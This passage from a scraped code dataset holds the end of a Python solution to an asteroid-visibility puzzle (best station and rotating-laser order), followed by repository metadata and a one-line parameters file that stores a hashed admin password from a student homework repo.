.#....####""")
assert best_station(A2) == (Asteroid(5, 8), 33)
A3 = parse(""".#..##.###...#######
##.############..##.
.#.######.########.#
.###.#######.####.#.
#####.##.#.##.###.##
..#####..#.#########
####################
#.####....###.#.#.##
##.#################
#####.##.###..####..
..######..##.#######
####.##.####...##..#
.#####..#.######.###
##...#.##########...
#.##########.#######
.####.#.###.###.#.##
....##.##.###..#####
.#.#.###########.###
#.#.#.#####.####.###
###.##.####.##.#..##""")
assert best_station(A3) == (Asteroid(11, 13), 210)
def faux_angle(asteroid):
dx, dy = asteroid
if dx == 0 and dy < 0:
# e.g. (0, -1), straight up
return (0, 0)
elif dx > 0 and dy < 0:
# e.g. (0.1, -0.9) or (0.9, -0.1)
return (1, dx / abs(dy))
elif dx > 0 and dy == 0:
return (2, 0)
elif dx > 0 and dy > 0:
# e.g. (0.9, 0.1) or (0.1, 0.9)
return (3, dy / dx)
elif dx == 0 and dy > 0:
return (4, 0)
elif dx < 0 and dy > 0:
# e.g. (-0.1, 0.9) or (-0.9, 0.1)
return (5, abs(dx) / dy)
elif dx < 0 and dy == 0:
return (6, 0)
elif dx < 0 and dy < 0:
# e.g. (-0.9, -0.1) or (-0.1, -0.9)
return (7, dy / dx)
def iterate(asteroids: Asteroids, station: Asteroid) -> Iterator[Asteroid]:
asteroids_by_angle = defaultdict(list)
for x, y in asteroids:
dx = x - station.x
dy = y - station.y
gcd = math.gcd(dx, dy)
if dx == dy == 0:
pass
else:
angle = (dx / gcd, dy / gcd)
asteroids_by_angle[angle].append(Asteroid(x, y))
# sort by length descending for each angle
for angle_asteroids in asteroids_by_angle.values():
angle_asteroids.sort(key=lambda a: abs(a.x - station.x) + abs(a.y - station.y), reverse=True)
while asteroids_by_angle:
keys = asteroids_by_angle.keys() # (dx, dy)
keys = sorted(keys, key=faux_angle)
for key in keys:
angle_asteroids = asteroids_by_angle[key]
yield angle_asteroids.pop()
if not angle_asteroids:
del asteroids_by_angle[key]
with open('day10_input.txt') as f:
asteroids = parse(f.read().strip())
part1 = best_station(asteroids)[1]
print(f'part 1: {part1}')
station = best_station(asteroids)[0]
vaporizations = list(iterate(asteroids, station))
part2 = vaporizations[199].x * 100 + vaporizations[199].y
print(f'part 2: {part2}')
| 24.146667
| 101
| 0.47598
|
acff916c9c13ec45d8705a7c78687da27d11f532
| 92
|
py
|
Python
|
parameters_8560.py
|
ksuhr1/CMPS183-hw3
|
d0450827912b7ec355a9e433c0c7e33d1b2610a0
|
[
"BSD-3-Clause"
] | null | null | null |
parameters_8560.py
|
ksuhr1/CMPS183-hw3
|
d0450827912b7ec355a9e433c0c7e33d1b2610a0
|
[
"BSD-3-Clause"
] | null | null | null |
parameters_8560.py
|
ksuhr1/CMPS183-hw3
|
d0450827912b7ec355a9e433c0c7e33d1b2610a0
|
[
"BSD-3-Clause"
] | null | null | null |
password="pbkdf2(1000,20,sha512)$b24904a15adb4514$85f395bc9c1f6be8227d9f7540e54127cd4f0fdf"
| 46
| 91
| 0.891304
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.